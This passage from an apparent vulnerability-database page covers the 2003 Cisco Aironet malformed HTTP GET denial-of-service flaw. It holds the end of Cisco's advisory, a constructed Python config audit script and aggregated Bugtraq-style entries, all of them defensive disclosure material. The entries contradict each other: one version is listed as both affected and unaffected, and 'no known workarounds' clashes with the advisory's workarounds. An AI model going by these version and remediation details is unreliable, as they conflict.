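   HTTP server is still reachable from arbitrary hosts, i.e. whether neither
   of the two workarounds above (access-class restriction or disabling HTTP)
   is in place. The configuration strings are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample configs (not taken from the advisory). The first applies
# the advisory's access-class workaround; the second leaves HTTP open.
HARDENED_CONFIG = """\
hostname ap
ip http server
ip http access-class 10
access-list 10 permit host 10.0.0.1
line vty 0 4
 transport input ssh
"""

EXPOSED_CONFIG = """\
hostname ap
ip http server
line vty 0 4
 transport input telnet
"""


def parse_standard_acls(config: str) -> Dict[str, List[str]]:
    """Collect entries of numbered standard ACLs keyed by ACL number.
    Simplification: only the classic 1-99 range is treated as standard."""
    acls: Dict[str, List[str]] = {}
    for line in config.splitlines():
        m = re.match(r"access-list (\d+) (.+)", line.strip())
        if m and 1 <= int(m.group(1)) <= 99:
            acls.setdefault(m.group(1), []).append(m.group(2))
    return acls


def audit_http_exposure(config: str) -> List[str]:
    """Return findings; an empty list means HTTP is off or host-restricted."""
    findings: List[str] = []
    lines = [l.strip() for l in config.splitlines()]
    if "ip http server" not in lines:
        return findings  # HTTP disabled: the vulnerable service is not exposed
    ref = next((l.split()[-1] for l in lines
                if l.startswith("ip http access-class ")), None)
    if ref is None:
        findings.append("HTTP server enabled without 'ip http access-class'")
        return findings
    entries = parse_standard_acls(config).get(ref, [])
    if not entries:
        findings.append(f"access-class {ref} references ACL {ref}, "
                        f"but no access-list {ref} entries are present")
    for e in entries:  # only explicit 'permit host' entries are accepted
        if e.startswith("permit") and not e.startswith("permit host "):
            findings.append(f"ACL {ref} permits a non-host range: '{e}'")
    return findings
```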

Exploitation and Public Announcements

   This vulnerability was reported by Reda Zitouni from Vigilante. Their
   report can be found at
   http://www.vigilante.com/inetsecurity/advisories/VIGILANTE-2003002.htm

   The Cisco PSIRT is not aware of malicious use of the vulnerability
   described in this advisory.

Status of This Notice: FINAL

   This is a final advisory. Although Cisco cannot guarantee the accuracy of
   all statements in this advisory, all of the facts have been checked to the
   best of our ability. Cisco does not anticipate issuing updated versions of
   this advisory unless there is some material change in the facts. Should
   there be a significant change in the facts, Cisco will update this
   advisory.

   A stand-alone copy or paraphrase of the text of this security advisory
   that omits the distribution URL in the following section is an
   uncontrolled copy, and may lack important information or contain factual
   errors.

Distribution

   This notice will be posted on Cisco's worldwide website at .

   In addition to worldwide web posting, a text version of this notice is
   clear-signed with the Cisco PSIRT PGP key and is posted to the following
   e-mail and Usenet news recipients.

     * cust-security-announce@cisco.com

     * bugtraq@securityfocus.com

     * full-disclosure@lists.netsys.com

     * first-teams@first.org (includes CERT/CC)

     * cisco@spot.colorado.edu

     * cisco-nsp@puck.nether.net

     * comp.dcom.sys.cisco

     * Various internal Cisco mailing lists

   Future updates of this advisory, if any, will be placed on Cisco's
   worldwide website, but may or may not be actively announced on mailing
   lists or newsgroups. Users concerned about this problem are encouraged to
   check the above URL for any updates.

Revision History

   +------------------------------------------+
   |Revision|2003-July-28 16:00 UTC  |Initial |
   |1.0     |(GMT)                   |public  |
   |        |                        |release.|
   +------------------------------------------+

Cisco Security Procedures

   Complete information on reporting security vulnerabilities in Cisco
   products, obtaining assistance with security incidents, and registering to
   receive security information from Cisco, is available on Cisco's worldwide
   website at
   http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This
   includes instructions for press inquiries regarding Cisco security
   notices. All Cisco security advisories are available at
   http://www.cisco.com/go/psirt.

     ----------------------------------------------------------------------

   This notice is Copyright 2003 by Cisco Systems, Inc. This notice may be
   redistributed freely after the release date given at the top of the text,
   provided that redistributed copies are complete and unmodified, and
   include all date and version information.

     ----------------------------------------------------------------------

- Vulnerability Information

2309
Cisco Aironet HTTP GET DoS
Denial of Service
Loss of Availability

- Vulnerability Description

Cisco IOS contains a flaw that may allow a remote denial of service. The issue is triggered when a specially crafted URL is sent by an attacker, and will result in loss of availability for the device.

- Timeline

2003-07-03 2003-06-19
Unknown Unknown

- Solution

Upgrade to version indicated by Cisco product matrix, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service Vulnerability
Class: Failure to Handle Exceptional Conditions
Bugtraq ID: 8290
Remote: Yes
Local: No
Published: 2003-07-28 12:00:00
Updated: 2009-07-11 10:56:00
This issue was discovered by Reda Zitouni.

- Affected Software Versions

Cisco IOS 12.2(8)JA
Cisco IOS 12.2(4)JA1
Cisco IOS 12.2(4)JA
Cisco IOS 12.2(11)JA
Cisco IOS 12.2(11)JA1

- Unaffected Software Versions

Cisco IOS 12.2(11)JA1

- Vulnerability Discussion

Cisco Aironet AP1x00 series devices are prone to a denial of service vulnerability upon receipt of a malformed HTTP GET request. Such a request will cause the device to reload.

- Exploit

There is no exploit required.

- Solution

Cisco has released updates to address this issue. Please see the attached advisory for details on obtaining and applying updates.

- References


About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China dedicated to SCAP. For more information, see [About this site]

Copyright Notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites